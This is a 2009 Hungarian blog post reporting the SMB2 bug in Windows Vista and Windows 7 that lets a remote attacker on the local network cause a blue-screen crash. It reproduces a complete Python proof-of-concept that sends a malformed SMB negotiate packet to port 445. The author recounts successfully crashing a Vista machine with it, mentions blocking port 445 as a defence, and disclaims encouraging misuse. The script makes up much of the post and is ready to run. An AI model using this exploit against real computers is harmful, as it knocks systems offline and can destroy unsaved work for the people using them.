sidenote » Windows Vista és Windows 7 RC remote BSOD bug

Windows Vista és Windows 7 RC remote BSOD bug

szantaii
2009. szeptember 11.
16:05
Microsoft lol szoftver videó

Windows Vista és Windows 7 userek figyelem!

Egy, a Windows Vista-ban és a Windows 7-ben jelen levő bug lehetővé teszi a távoli (helyi hálózaton levő) támadó számára, hogy bizonyos beállítások mellett “elkékhaláloztathassa” az áldozat számítógépét. Az SMB2 protokoll implementációban található bug egy egyszerű python script-tel triggerelhető:

# SecurityReason Note : # Tested on : Windows Vista SP2 full updated - US-en # #!/usr/bin/python # When SMB2.0 recieve a "&" char in the "Process Id High" header field it # dies with a # PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket from time import sleep

host = "ip_cim", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()

A bejelentés szerint a Windows Vista / Windows 7 érintett. A Windows Server 2008 is érintett lehet. A Microsoft még nem reagált a hibára, javítás még nincs. A probléma ellen védekezni lehet a 445-ös portra érkező forgalom blokkolásával.

[via HUP]

Szerdán ezt a bejegyzést lehetett olvasni a HUP-on, amit azóta többször is frissítettek.

A híren fellelkesülve Gergővel kipróbáltuk egy helyi hálón ezt a bugot, mellyel sikeresen elkékhaláloztattunk egy Windows Vista-t. Gyorsan videóra is vettük a dolgot, amin ugyan nem sok minden látszik, de a lényeg azért talán mégis.

Ebben az egészben az a vicc, hogy BSOD-dal elszáll az egész oprendszer. Azt még megérteném, ha meghalna a file and print sharing szolgáltatás, de hogy magával rántja az egészet az azért nevetséges.

Ezzel a bejegyzéssel természetesen senkit nem akarunk ennek a hibának a kihasználására buzdítani, mert azért mocsok dolog mondjuk egy kolléga gépét a munka közben kinyírni. Én csak hírül adtam, illetve megmutattam, hogy van ilyen.